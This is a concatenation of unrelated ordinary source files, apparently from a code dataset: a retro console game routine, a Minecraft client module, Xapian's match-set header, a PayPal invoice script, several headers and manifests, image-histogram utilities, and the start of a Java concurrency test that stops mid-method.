SMS_finalizeSprites (); // Wait for VSync and update SAT SMS_waitForVBlank (); SMS_copySpritestoSAT (); // Murcia stuff PSGFrame (); PSGSFXFrame (); } PSGStop (); // Wait 1 second wait_frames (50); PSGSFXStop (); // Last tile is a black tile. effect (TITLE_NPATTERNS - 1); SMS_displayOff (); return menu_choice; } void do_vs_screen (void) { // Who won? if (friends [0] == friends [1]) { who_won = 2; } else { who_won = friends [0] < friends [1]; won [who_won] ++; } // Set palettes SMS_loadBGPalette (palette_4); // Load patterns for tiles. VS_SCR_NPATTERNS tiles, 32 bytes per tile SMS_loadTiles (vs_scr_patterns, 0, VS_SCR_NPATTERNS * 32); // Clear nametable to char 0 cls (); /*SMS_setNextTileatXY (0, 0); for (gpit = 0; gpit < VS_SCR_NPATTERNS; gpit ++) SMS_setTile (gpit); */ // Draw context dependent stuff if (who_won == 1) { print_str (14, 2, "WAW"); SMS_loadTileMapArea (12, 6, vs_scr_sect_01, 8, 12); } else if (who_won == 0) { print_str (13, 2, "MOGGY"); SMS_loadTileMapArea (12, 6, vs_scr_sect_00, 8, 12); } // Draw fixed stuff // Moggy stats print_str (1, 5, "1UP MOGGY"); SMS_setTileatXY (3, 7, VS_SCR_NPATTERNS - 3); SMS_setTile (59); print_3digits_next (friends [0]); write_big_num (3, 9, score [0]); print_str (3, 11, "TOTAL"); thick_number (2, 13, won [0] / 10, VS_SCR_NPATTERNS - 2); thick_number (6, 13, won [0] % 10, VS_SCR_NPATTERNS - 2); // Waw stats print_str (23, 5, "2UP WAW"); SMS_setTileatXY (24, 7, VS_SCR_NPATTERNS - 3); SMS_setTile (59); print_3digits_next (friends [1]); write_big_num (24, 9, score [1]); print_str (24, 11, "TOTAL"); thick_number (23, 13, won [1] / 10, VS_SCR_NPATTERNS - 2); thick_number (27, 13, won [1] % 10, VS_SCR_NPATTERNS - 2); // General if (who_won != 2) { print_str (13, 4, "WINS!!"); } else { print_str (13, 4, "DRAW!!"); } if (do_game) { print_str (11, 21, "<NAME>!"); } else { print_str (11, 21, "GAME OVER!"); } // Screen on SMS_displayOn (); // Murcia stuff PSGPlay (m_vs [tv_system]); // Wait input wait_button (); PSGStop (); PSGSFXPlay (s_start [tv_system], SFX_CHANNEL2); wait_frames (50); // Last tile is a black tile. effect (VS_SCR_NPATTERNS - 1); SMS_displayOff (); }
1,570
4,002
<filename>src/main/java/me/zeroX150/cornos/features/module/impl/misc/ClientProgression.java<gh_stars>1000+
/*
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# Project: Cornos
# File: ClientProgression
# Created by constantin at 17:56, Mär 31 2021

PLEASE READ THE COPYRIGHT NOTICE IN THE PROJECT ROOT, IF EXISTENT
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 */
package me.zeroX150.cornos.features.module.impl.misc;

import me.zeroX150.cornos.etc.config.MConfToggleable;
import me.zeroX150.cornos.features.module.Module;
import me.zeroX150.cornos.features.module.ModuleType;

public class ClientProgression extends Module {
    public static MConfToggleable hasFinishedTut = new MConfToggleable("finishedTutorial", false);

    public ClientProgression() {
        super("clientprogression", "how much you progressed with using the client", ModuleType.HIDDEN);
        this.mconf.add(hasFinishedTut);
    }
}
291
370
/** @file protomset.h * @brief ProtoMSet class */ /* Copyright (C) 2004,2007,2017,2018,2019 <NAME> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #ifndef XAPIAN_INCLUDED_PROTOMSET_H #define XAPIAN_INCLUDED_PROTOMSET_H #include "xapian/api/enquireinternal.h" #include "xapian/api/result.h" #include "xapian/matcher/collapser.h" #include "xapian/common/heap.h" #include "xapian/matcher/matchtimeout.h" #include "xapian/matcher/msetcmp.h" #include "xapian/common/omassert.h" #include "xapian/matcher/spymaster.h" #include "xapian/common/stdclamp.h" #include <algorithm> using Xapian::Internal::intrusive_ptr; class ProtoMSet { /// Adapt MSetCmp to be usable with min_heap. class MCmpAdaptor { ProtoMSet* protomset; public: explicit MCmpAdaptor(ProtoMSet* protomset_) : protomset(protomset_) {} bool operator()(Xapian::doccount a, Xapian::doccount b) const { return protomset->mcmp(protomset->results[a], protomset->results[b]); } }; friend class MCmpAdaptor; /** Maximum size the ProtoMSet needs to grow to. * * This is the maximum rank we care about. */ Xapian::doccount max_size; Xapian::doccount check_at_least; Xapian::Enquire::Internal::sort_setting sort_by; MSetCmp mcmp; /** Minimum threshold on the weight. * * If the primary result ordering is by decreasing relevance (i.e. @a * sort_by is REL or REL_VAL) then once the min_heap kicks in this * threshold is raised to the lowest weight in the proto-mset. * * Enquire::set_cutoff() can also affect min_weight - an absolute * threshold determines the initial value; a percentage threshold raises * the threshold each time max_weight increases (unless it's already * higher than the value the percentage threshold results in). */ double min_weight = 0.0; /** The highest document weight seen. * * This weight may not actually be present in @a results if we're not * sorting primarily by relevance, or if min_weight > max_weight. */ double max_weight = 0.0; bool min_weight_pending = false; /** Count of how many known matching documents have been processed so far. * * Used to implement "check_at_least". */ Xapian::doccount known_matching_docs = 0; /// The items in the proto-MSet. vector<Result> results; /** A heap of offsets into @a results. * * Created lazily once we actually need it. */ vector<Xapian::doccount> min_heap; /// First entry wanted in MSet. Xapian::doccount first; /** How many weighted leaf subqueries there are. * * Used for scaling percentages when the highest weighted document doesn't * "match all terms". */ Xapian::termcount total_subqs; /// The number of subqueries which matched to give max_weight. 
Xapian::termcount max_weight_subqs_matched = 0; int percent_threshold; double percent_threshold_factor; double percent_scale = 0.0; PostListTree& pltree; Collapser collapser; double max_possible; bool stop_once_full; TimeOut timeout; public: ProtoMSet(Xapian::doccount first_, Xapian::doccount max_items, Xapian::doccount check_at_least_, MSetCmp mcmp_, Xapian::Enquire::Internal::sort_setting sort_by_, Xapian::termcount total_subqs_, PostListTree& pltree_, Xapian::valueno collapse_key, Xapian::doccount collapse_max, int percent_threshold_, double percent_threshold_factor_, double max_possible_, bool stop_once_full_, double time_limit) : max_size(first_ + max_items), check_at_least(check_at_least_), sort_by(sort_by_), mcmp(mcmp_), first(first_), total_subqs(total_subqs_), percent_threshold(percent_threshold_), percent_threshold_factor(percent_threshold_factor_), pltree(pltree_), collapser(collapse_key, collapse_max, results, mcmp), max_possible(max_possible_), stop_once_full(stop_once_full_), timeout(time_limit) { results.reserve(max_size); } ProtoMSet(const ProtoMSet&) = delete; ProtoMSet& operator=(const ProtoMSet&) = delete; Collapser& get_collapser() { return collapser; } bool full() const { return results.size() == max_size; } double get_min_weight() const { return min_weight; } void update_max_weight(double weight) { if (weight <= max_weight) return; max_weight = weight; max_weight_subqs_matched = pltree.count_matching_subqs(); if (percent_threshold) { set_new_min_weight(weight * percent_threshold_factor); } } bool checked_enough() { if (known_matching_docs >= check_at_least) { return true; } if (known_matching_docs >= max_size && timeout.timed_out()) { check_at_least = max_size; return true; } return false; } /** Resolve a pending min_weight change. * * Only called when there's a percentage weight cut-off. */ bool handle_min_weight_pending(bool finalising = false) { // min_weight_pending shouldn't get set when unweighted. Assert(sort_by != Xapian::Enquire::Internal::DOCID); min_weight_pending = false; bool weight_first = (sort_by == Xapian::Enquire::Internal::REL || sort_by == Xapian::Enquire::Internal::REL_VAL); double new_min_weight = HUGE_VAL; size_t j = 0; size_t min_elt = 0; for (size_t i = 0; i != results.size(); ++i) { if (results[i].get_weight() < min_weight) { continue; } if (i != j) { results[j] = std::move(results[i]); if (collapser) { collapser.result_has_moved(i, j); } } if (weight_first && results[j].get_weight() < new_min_weight) { new_min_weight = results[j].get_weight(); min_elt = j; } ++j; } if (weight_first) { if (finalising) { if (known_matching_docs >= check_at_least) min_weight = new_min_weight; } else { if (checked_enough()) min_weight = new_min_weight; } } if (j != results.size()) { results.erase(results.begin() + j, results.end()); if (!finalising) { return false; } } if (!finalising && min_elt != 0 && !collapser) { // Install the correct element at the tip of the heap, so // that Heap::make() has less to do. NB Breaks collapsing. swap(results[0], results[min_elt]); } return true; } bool early_reject(Result& new_item, bool calculated_weight, SpyMaster& spymaster, const Xapian::Document& doc) { if (min_heap.empty()) return false; // We're sorting by value (in part at least), so compare the item // against the lowest currently in the proto-mset. If sort_by is VAL, // then new_item.get_weight() won't be set yet, but that doesn't matter // since it's not used by the sort function. 
Xapian::doccount worst_idx = min_heap.front(); if (mcmp(new_item, results[worst_idx])) return false; // The candidate isn't good enough to make the proto-mset, but there // are still things we may need to do with it. // If we're collapsing, we need to check if this would have been // collapsed before incrementing known_matching_docs. if (!collapser) { ++known_matching_docs; double weight = calculated_weight ? new_item.get_weight() : pltree.get_weight(); spymaster(doc, weight); update_max_weight(weight); return true; } if (checked_enough()) { // We've seen enough items so can drop this one. double weight = calculated_weight ? new_item.get_weight() : pltree.get_weight(); update_max_weight(weight); return true; } // We can't drop the item because we need to test whether it would be // collapsed. return false; } /** Process new_item. * * Conceptually this is "add new_item", but taking into account * collapsing. */ bool process(Result&& new_item, ValueStreamDocument& vsdoc) { update_max_weight(new_item.get_weight()); if (!collapser) { // No collapsing, so just add the item. add(std::move(new_item)); } else { auto res = collapser.check(new_item, vsdoc); switch (res) { case REJECT: return true; case REPLACE: // There was a previous item in the collapse tab so the // MSet can't be empty. Assert(!results.empty()); // This is one of the best collapse_max potential MSet // entries with this key which we've seen so far. The // entry with this key which it displaced is still in the // proto-MSet so replace it. replace(collapser.old_item, std::move(new_item)); return true; default: break; } auto elt = add(std::move(new_item)); if (res != EMPTY && elt != Xapian::doccount(-1)) { collapser.process(res, elt); } } if (stop_once_full) { if (full() && checked_enough()) { return false; } } return true; } // Returns the new item's index, or Xapian::doccount(-1) if not added. Xapian::doccount add(Result&& item) { ++known_matching_docs; if (item.get_weight() < min_weight) { return Xapian::doccount(-1); } if (item.get_weight() > max_weight) { update_max_weight(item.get_weight()); } if (results.size() < max_size) { // We're still filling, or just about to become full. results.push_back(std::move(item)); Assert(min_heap.empty()); return results.size() - 1; } if (min_heap.empty()) { // This breaks if we're collapsing because it moves elements around // but can be used if we aren't (and could be for elements with // no collapse key too - FIXME). if (min_weight_pending) { if (!handle_min_weight_pending()) { results.push_back(std::move(item)); return results.size() - 1; } } if (results.size() == 0) { // E.g. get_mset(0, 0, 10); return Xapian::doccount(-1); } min_heap.reserve(results.size()); for (Xapian::doccount i = 0; i != results.size(); ++i) min_heap.push_back(i); Heap::make(min_heap.begin(), min_heap.end(), MCmpAdaptor(this)); if (sort_by == Xapian::Enquire::Internal::REL || sort_by == Xapian::Enquire::Internal::REL_VAL) { if (checked_enough()) { min_weight = results[min_heap.front()].get_weight(); } } } Xapian::doccount worst_idx = min_heap.front(); if (!mcmp(item, results[worst_idx])) { // The new item is less than what we already had. 
return Xapian::doccount(-1); } results[worst_idx] = std::move(item); Heap::replace(min_heap.begin(), min_heap.end(), MCmpAdaptor(this)); if (sort_by == Xapian::Enquire::Internal::REL || sort_by == Xapian::Enquire::Internal::REL_VAL) { if (checked_enough()) { min_weight = results[min_heap.front()].get_weight(); } } return worst_idx; } void replace(Xapian::doccount old_item, Result&& b) { results[old_item] = std::move(b); if (min_heap.empty()) return; // We need to find the entry in min_heap corresponding to old_item. // The simplest way is just to linear-scan for it, and that's actually // fairly efficient as we're just searching for an integer in a // vector of integers. The heap structure means that the lowest ranked // entry is first and lower ranked entries will tend to be nearer the // start, so intuitively scanning forwards for an entry which we're // removing because we found a higher ranking one seems sensible, but // I've not actually profiled this. auto it = std::find(min_heap.begin(), min_heap.end(), old_item); if (rare(it == min_heap.end())) { // min_heap should contain all indices of results. Assert(false); return; } // siftdown() here is correct (because it's on a min-heap). Heap::siftdown(min_heap.begin(), min_heap.end(), it, MCmpAdaptor(this)); } void set_new_min_weight(double min_wt) { if (min_wt <= min_weight) return; min_weight = min_wt; if (results.empty()) { // This method gets called before we start matching to set the // fixed weight_threshold threshold. return; } #if 0 // FIXME: Is this possible? set_new_min_weight() from a percentage // threshold can't do this... if (min_wt > max_weight) { // The new threshold invalidates all current entries. results.resize(0); min_heap.resize(0); return; } #endif if (!min_heap.empty()) { // If sorting primarily by weight, we could pop the heap while the // tip's weight is < min_wt, but each pop needs 2*log(n) // comparisons, and then pushing replacements for each of those // items needs log(n) comparisons. // // Instead we just discard the heap - if we need to rebuild it, // that'll require 3*n comparisons. The break even is about 3 // discarded items for n=10 or about 5 for n=100, but we may never // need to rebuild the heap. min_heap.clear(); } // Note that we need to check items against min_weight at some point. min_weight_pending = true; } void finalise_percentages() { if (results.empty() || max_weight == 0.0) return; percent_scale = max_weight_subqs_matched / double(total_subqs); percent_scale /= max_weight; Assert(percent_scale > 0); if (!percent_threshold) { return; } // Truncate the results if necessary. set_new_min_weight(percent_threshold_factor / percent_scale); if (min_weight_pending) { handle_min_weight_pending(true); } } Xapian::MSet finalise(const Xapian::MatchDecider* mdecider, Xapian::doccount matches_lower_bound, Xapian::doccount matches_estimated, Xapian::doccount matches_upper_bound) { finalise_percentages(); AssertRel(matches_estimated, >=, matches_lower_bound); AssertRel(matches_estimated, <=, matches_upper_bound); Xapian::doccount uncollapsed_lower_bound = matches_lower_bound; Xapian::doccount uncollapsed_estimated = matches_estimated; Xapian::doccount uncollapsed_upper_bound = matches_upper_bound; if (!full()) { // We didn't get all the results requested, so we know that we've // got all there are, and the bounds and estimate are all equal to // that number. 
matches_lower_bound = results.size(); matches_estimated = matches_lower_bound; matches_upper_bound = matches_lower_bound; // And that should equal known_matching_docs, unless a percentage // threshold caused some matches to be excluded. if (!percent_threshold) { AssertEq(matches_estimated, known_matching_docs); } else { AssertRel(matches_estimated, <=, known_matching_docs); } } else if (!collapser && known_matching_docs < check_at_least) { // Similar to the above, but based on known_matching_docs. matches_lower_bound = known_matching_docs; matches_estimated = matches_lower_bound; matches_upper_bound = matches_lower_bound; } else { // We can end up scaling the estimate more than once, so collect // the scale factors and apply them in one go to avoid rounding // more than once. double estimate_scale = 1.0; double unique_rate = 1.0; if (collapser) { matches_lower_bound = collapser.get_matches_lower_bound(); Xapian::doccount docs_considered = collapser.get_docs_considered(); Xapian::doccount dups_ignored = collapser.get_dups_ignored(); if (docs_considered > 0) { // Scale the estimate by the rate at which we've been // finding unique documents. double unique = double(docs_considered - dups_ignored); unique_rate = unique / double(docs_considered); } // We can safely reduce the upper bound by the number of // duplicates we've ignored. matches_upper_bound -= dups_ignored; } if (mdecider) { if (!percent_threshold && !collapser) { if (known_matching_docs > matches_lower_bound) { // We're not collapsing or doing a percentage // threshold, so known_matching_docs is a lower bound // on the total number of matches. matches_lower_bound = known_matching_docs; } } Xapian::doccount decider_denied = mdecider->docs_denied_; Xapian::doccount decider_considered = mdecider->docs_allowed_ + mdecider->docs_denied_; // Scale the estimate by the rate at which the MatchDecider has // been accepting documents. if (decider_considered > 0) { double accept = double(decider_considered - decider_denied); double accept_rate = accept / double(decider_considered); estimate_scale *= accept_rate; } // If a document is denied by the MatchDecider, it can't be // found to be a duplicate, so it is safe to also reduce the // upper bound by the number of documents denied by the // MatchDecider. matches_upper_bound -= decider_denied; if (collapser) uncollapsed_upper_bound -= decider_denied; } if (percent_threshold) { // Scale the estimate assuming that document weights are evenly // distributed from 0 to the maximum weight seen. estimate_scale *= (1.0 - percent_threshold_factor); // This is all we can be sure of without additional work. matches_lower_bound = results.size(); if (collapser) { uncollapsed_lower_bound = matches_lower_bound; } } if (collapser && estimate_scale != 1.0) { uncollapsed_estimated = Xapian::doccount(uncollapsed_estimated * estimate_scale + 0.5); } estimate_scale *= unique_rate; if (estimate_scale != 1.0) { matches_estimated = Xapian::doccount(matches_estimated * estimate_scale + 0.5); if (matches_estimated < matches_lower_bound) matches_estimated = matches_lower_bound; } if (collapser || mdecider) { // Clamp the estimate the range given by the bounds. 
AssertRel(matches_lower_bound, <=, matches_upper_bound); matches_estimated = STD_CLAMP(matches_estimated, matches_lower_bound, matches_upper_bound); } else if (!percent_threshold) { AssertRel(known_matching_docs, <=, matches_upper_bound); if (known_matching_docs > matches_lower_bound) matches_lower_bound = known_matching_docs; if (known_matching_docs > matches_estimated) matches_estimated = known_matching_docs; } if (collapser && !mdecider && !percent_threshold) { AssertRel(known_matching_docs, <=, uncollapsed_upper_bound); if (known_matching_docs > uncollapsed_lower_bound) uncollapsed_lower_bound = known_matching_docs; } } if (collapser && matches_lower_bound > uncollapsed_lower_bound) { // Clamp the uncollapsed bound to be at least the collapsed one. uncollapsed_lower_bound = matches_lower_bound; } if (collapser) { // Clamp the estimate to lie within the known bounds. if (uncollapsed_estimated < uncollapsed_lower_bound) { uncollapsed_estimated = uncollapsed_lower_bound; } else if (uncollapsed_estimated > uncollapsed_upper_bound) { uncollapsed_estimated = uncollapsed_upper_bound; } } else { // When not collapsing the uncollapsed bounds are just the same. uncollapsed_lower_bound = matches_lower_bound; uncollapsed_estimated = matches_estimated; uncollapsed_upper_bound = matches_upper_bound; } // FIXME: Profile using min_heap here (when it's been created) to // handle "first" and perform the sort. if (first != 0) { if (first > results.size()) { results.clear(); } else { // We perform nth_element() on reverse iterators so that the // unwanted elements end up at the end of items, which means // that the call to erase() to remove them doesn't have to copy // any elements. auto nth = results.rbegin() + first; std::nth_element(results.rbegin(), nth, results.rend(), mcmp); // Discard the unwanted elements. results.erase(results.end() - first, results.end()); } } std::sort(results.begin(), results.end(), mcmp); collapser.finalise(min_weight, percent_threshold); // The estimates should lie between the bounds. AssertRel(matches_lower_bound, <=, matches_estimated); AssertRel(matches_estimated, <=, matches_upper_bound); AssertRel(uncollapsed_lower_bound, <=, uncollapsed_estimated); AssertRel(uncollapsed_estimated, <=, uncollapsed_upper_bound); // Collapsing should only reduce the bounds and estimate. AssertRel(matches_lower_bound, <=, uncollapsed_lower_bound); AssertRel(matches_estimated, <=, uncollapsed_estimated); AssertRel(matches_upper_bound, <=, uncollapsed_upper_bound); return Xapian::MSet(new Xapian::MSet::Internal(first, matches_upper_bound, matches_lower_bound, matches_estimated, uncollapsed_upper_bound, uncollapsed_lower_bound, uncollapsed_estimated, max_possible, max_weight, std::move(results), percent_scale * 100.0)); } }; #endif // XAPIAN_INCLUDED_PROTOMSET_H
8,104
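The C++ record above keeps the candidate MSet as a bounded container with a lazily built min-heap and a minimum-weight threshold that only rises. The snippet below is a deliberately simplified Python illustration of that one idea (top-k by weight with a moving cut-off); it is not the Xapian implementation and ignores collapsing, sort orders and percentage cut-offs.

# Illustrative sketch: keep the k best-weighted items, raising the admission threshold
# once the container is full, as the ProtoMSet above does in the relevance-only case.
import heapq


def top_k_by_weight(items, k):
    """items: iterable of (doc_id, weight); returns the k heaviest, best first."""
    heap = []  # min-heap of (weight, doc_id); heap[0] is the worst item currently kept
    min_weight = float("-inf")
    for doc_id, weight in items:
        if len(heap) < k:
            heapq.heappush(heap, (weight, doc_id))
            if len(heap) == k:
                min_weight = heap[0][0]
        elif weight > min_weight:
            heapq.heapreplace(heap, (weight, doc_id))
            min_weight = heap[0][0]  # threshold only ever rises
    return [(d, w) for w, d in sorted(heap, reverse=True)]


print(top_k_by_weight([(1, 0.2), (2, 0.9), (3, 0.5), (4, 0.7)], 2))  # [(2, 0.9), (4, 0.7)]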
653
from paypalrestsdk import Invoice
import logging

logging.basicConfig(level=logging.INFO)

invoice = Invoice.find("INV2-9DRB-YTHU-2V9Q-7Q24")

if invoice.send():  # return True or False
    print("Invoice[%s] send successfully" % (invoice.id))
else:
    print(invoice.error)
107
732
//
//  DSEmotionToolbar.h
//  DSLolita
//
//  Created by <NAME> on 15/5/28.
//  Copyright (c) 2015年 samDing. All rights reserved.
//

#import <UIKit/UIKit.h>

@class DSEmotionToolbar;

typedef enum {
    DSEmotionTypeRecent = 1,
    DSEmotionTypeDefault,
    DSEmotionTypeEmoji,
    DSEmotionTypeLxh
} DSEmotionTYype;

@protocol DSEmotionToolbarDelegate <NSObject>

@optional
- (void)emotionToolbar:(DSEmotionToolbar *)toolbar didSelectedButton:(DSEmotionTYype)emotionType;

@end

@interface DSEmotionToolbar : UIView

@property (nonatomic, assign) DSEmotionTYype currentButtonType;
@property (nonatomic, weak) id<DSEmotionToolbarDelegate> delegate;

@end
250
1,104
<gh_stars>1000+
{
  "html": "heartbeats.html",
  "css": "heartbeats.css",
  "authors": "<NAME>",
  "roll20userid": "1332302",
  "preview": "heartbeats.png",
  "instructions": "A sheet for Heartbeats in Perfect Sync by <NAME>."
}
93
606
<reponame>zjcs/ICE-BA<gh_stars>100-1000 /****************************************************************************** * Copyright 2017-2018 Baidu Robotic Vision Authors. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. *****************************************************************************/ #include <glog/logging.h> #include "image_utils.h" //#include <driver/xp_aec_table.h> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/highgui.hpp> #include <boost/lexical_cast.hpp> #include <iostream> #ifndef __DEVELOPMENT_DEBUG_MODE__ #define __IMAGE_UTILS_NO_DEBUG__ #endif namespace XP { // only use central area in the image constexpr int kMarginRow = 50; constexpr int kMarginCol = 100; constexpr int kPixelStep = 2; // Compute the histogram of a sampled area of the input image and return the number of // sampled pixels // [NOTE] This function is hardcoded for VGA / WVGA images for now int sampleBrightnessHistogram(const cv::Mat& raw_img, std::vector<int>* histogram, int* avg_pixel_val_ptr) { const int end_row = raw_img.rows - kMarginRow; const int end_col = raw_img.cols - kMarginCol; // Given the current algorithm, collecting histogram is not // necessary. But we still do so in case later we switch to a better // algorithm int pixel_num = 0; int avg_pixel_val = 0; histogram->clear(); histogram->resize(256, 0); int over_exposure_pixel_num = 0; for (int i = kMarginRow; i < end_row; i += kPixelStep) { for (int j = kMarginCol; j < end_col; j += kPixelStep) { const uint8_t pixel_val = raw_img.data[i * raw_img.cols + j]; avg_pixel_val += pixel_val; (*histogram)[pixel_val]++; ++pixel_num; } } if (avg_pixel_val_ptr) { *avg_pixel_val_ptr = avg_pixel_val / pixel_num; } return pixel_num; } // [NOTE] Instead of matching the cdf(s), we brute-force scale the histograms and match them // directly. This matchingHistogram is intended to match two histograms of images taken with // different gain/exposure settings. 
float matchingHistogram(const std::vector<int>& hist_src, const std::vector<int>& hist_tgt, const float init_scale) { std::vector<int> cdf_tgt(256); cdf_tgt[0] = hist_tgt[0]; for (int i = 1; i < 256; ++i) { cdf_tgt[i] = hist_tgt[i] + cdf_tgt[i - 1]; } constexpr float delta_scale = 0.02; float best_scale = -1.f; // an invalid value int best_cdf_L1_dist = std::numeric_limits<int>::max(); for (int s = -4; s < 5; ++s) { float scale = init_scale + s * delta_scale; std::vector<int> hist_src_scale(256, 0); for (int i = 0; i < 256; ++i) { int si = i * scale; if (si >= 255) { int tmp_acc = 0; for (int j = i; j < 256; ++j) { tmp_acc += hist_src[j]; } hist_src_scale[255] = tmp_acc; break; } hist_src_scale[si] = hist_src_scale[si] + hist_src[i]; } int cdf_L1_dist = 0; int cdf_src_cumsum = 0; for (int i = 0; i < 256; ++i) { cdf_src_cumsum += hist_src_scale[i]; int L1_dist = std::abs(cdf_src_cumsum - cdf_tgt[i]); cdf_L1_dist += L1_dist; } // We simply assume these histograms are sampled from the same size of images CHECK_EQ(cdf_src_cumsum, cdf_tgt[255]); VLOG(1) << "scale = " << scale << " cdf_L1_dist = " << cdf_L1_dist; if (cdf_L1_dist < best_cdf_L1_dist) { best_scale = scale; best_cdf_L1_dist = cdf_L1_dist; if (VLOG_IS_ON(3)) { cv::Mat hist_canvas; const int scale = 2; const int height = 64 * scale; const int width = 256 * scale; hist_canvas.create(height * 2, width, CV_8UC3); hist_canvas.setTo(0x00); cv::Mat hist_img_src = hist_canvas(cv::Rect(0, 0, width, height)); drawHistogram(&hist_img_src, hist_src_scale); cv::Mat hist_img_tgt = hist_canvas(cv::Rect(0, height, width, height)); drawHistogram(&hist_img_tgt, hist_tgt); cv::imshow("matchingHistogram", hist_canvas); cv::waitKey(0); } } } CHECK_GT(best_scale, 0.f); VLOG(1) << "best scale = " << best_scale << " cdf_L1_dist = " << best_cdf_L1_dist; return best_scale; } void drawHistogram(cv::Mat* img_hist, const std::vector<int>& histogram) { // Get some stats of this histogram const int N = static_cast<int>(histogram.size()); int total_num = 0; int avg_pixel_val = 0; for (int i = 0; i < N; ++i) { total_num += histogram[i]; avg_pixel_val += histogram[i] * i; } avg_pixel_val /= total_num; int acc_pixel_counts = 0; int median_pixel_val; for (int i = 0; i < N; ++i) { acc_pixel_counts += histogram[i]; if (acc_pixel_counts >= total_num / 2) { median_pixel_val = i; break; } } const int scale = 2; const int width = N * scale + 1; const int height = 64 * scale; CHECK_NOTNULL(img_hist); if (img_hist->rows == 0) { img_hist->create(height, width, CV_8UC3); } img_hist->setTo(0x00); float hist_max = 0.1f; // scale the max y axis to 10% for (int i = 0; i < N; ++i) { float val = static_cast<float>(histogram[i]) / total_num / hist_max; cv::Rect rect(i * scale, height * (1 - val), scale, height * val); cv::rectangle(*img_hist, rect, cv::Scalar(0, 0, 255)); } cv::putText(*img_hist, "mean: " + boost::lexical_cast<std::string>(avg_pixel_val), cv::Point(15, 15), cv::FONT_HERSHEY_SIMPLEX, .5, cv::Scalar(255, 255, 255)); cv::putText(*img_hist, "median: " + boost::lexical_cast<std::string>(median_pixel_val), cv::Point(15, 30), cv::FONT_HERSHEY_SIMPLEX, .5, cv::Scalar(255, 255, 255)); } } // namespace XP
2,622
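The record above matches two brightness histograms by brute-forcing a small set of scale factors and comparing the resulting cumulative distributions with an L1 distance. Below is a compact NumPy restatement of that search, for illustration only; the step size and ±4-step range mirror the record, while the NumPy phrasing and function name are mine.

# Illustrative sketch: pick the scale that, applied to hist_src's pixel values,
# makes its CDF closest (L1 distance) to the CDF of hist_tgt.
import numpy as np


def match_histogram_scale(hist_src, hist_tgt, init_scale=1.0, delta=0.02, steps=4):
    hist_src = np.asarray(hist_src, dtype=np.int64)
    hist_tgt = np.asarray(hist_tgt, dtype=np.int64)
    cdf_tgt = np.cumsum(hist_tgt)
    best_scale, best_dist = None, None
    for s in range(-steps, steps + 1):
        scale = init_scale + s * delta
        scaled = np.zeros_like(hist_src)
        # Map bin i to int(i * scale), clamping overflow into the last bin.
        idx = np.minimum((np.arange(len(hist_src)) * scale).astype(int), len(hist_src) - 1)
        np.add.at(scaled, idx, hist_src)  # accumulate counts that land on the same bin
        dist = np.abs(np.cumsum(scaled) - cdf_tgt).sum()
        if best_dist is None or dist < best_dist:
            best_scale, best_dist = scale, dist
    return best_scale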
629
<filename>hardware/laser/include/laser/ros/laser_nodelet.h
/* Copyright (c) 2017, United States Government, as represented by the
 * Administrator of the National Aeronautics and Space Administration.
 *
 * All rights reserved.
 *
 * The Astrobee platform is licensed under the Apache License, Version 2.0
 * (the "License"); you may not use this file except in compliance with the
 * License. You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations
 * under the License.
 */

#ifndef LASER_ROS_LASER_NODELET_H_
#define LASER_ROS_LASER_NODELET_H_

#include <pluginlib/class_list_macros.h>
#include <ros/ros.h>
#include <ros/service_server.h>
#include <config_reader/config_reader.h>
#include <ff_hw_msgs/SetEnabled.h>
#include <ff_util/ff_names.h>
#include <ff_util/ff_nodelet.h>
#include <i2c/i2c_new.h>
#include <laser/laser.h>
#include <memory>
#include <stdexcept>
#include <string>
#include <system_error>  // NOLINT

namespace laser {
namespace ros {

class LaserNodelet : public ::ff_util::FreeFlyerNodelet {
 public:
  LaserNodelet();
  ~LaserNodelet();

  bool OnService(::ff_hw_msgs::SetEnabled::Request &req,
                 ::ff_hw_msgs::SetEnabled::Response &resp);

 protected:
  virtual void Initialize(::ros::NodeHandle *nh);

 private:
  using LaserPtr = std::unique_ptr<Laser>;

  LaserPtr laser_;
  ::ros::ServiceServer server_;
};

}  // namespace ros
}  // namespace laser

#endif  // LASER_ROS_LASER_NODELET_H_
614
5,169
<reponame>Gantios/Specs
{
  "name": "SNAugusPopView",
  "version": "0.1.1",
  "summary": "A very lightweight popView.",
  "description": "The popView support some directions of arrow,and show gradient and border effect.",
  "homepage": "https://github.com/venn0126/SNAugusPopView",
  "license": {
    "type": "MIT",
    "file": "LICENSE"
  },
  "authors": {
    "venn0126": "<EMAIL>"
  },
  "source": {
    "git": "https://github.com/venn0126/SNAugusPopView.git",
    "tag": "0.1.1"
  },
  "platforms": {
    "ios": "9.0"
  },
  "source_files": "SNAugusPopView/Classes/**/*"
}
247
14,499
/*
 * Copyright (c) Facebook, Inc. and its affiliates.
 *
 * This source code is licensed under the MIT license found in the
 * LICENSE file in the root directory of this source tree.
 */

import javax.annotation.concurrent.ThreadSafe;

// Test may_alias treatment of arrays
// two arrays of types in a subtype relation may alias, and race

@ThreadSafe
class Parent {}

@ThreadSafe
class Child extends Parent {}

@ThreadSafe
class Arrays {

  Child[] childArr = new Child[5];
  Parent[] parentArr = childArr; // actual aliasing not required, but for documentation

  final String[] strArr1 = new String[5];
  final String[] strArr2 = new String[5];

  void arrayParameterWriteBad(int[] name1) {
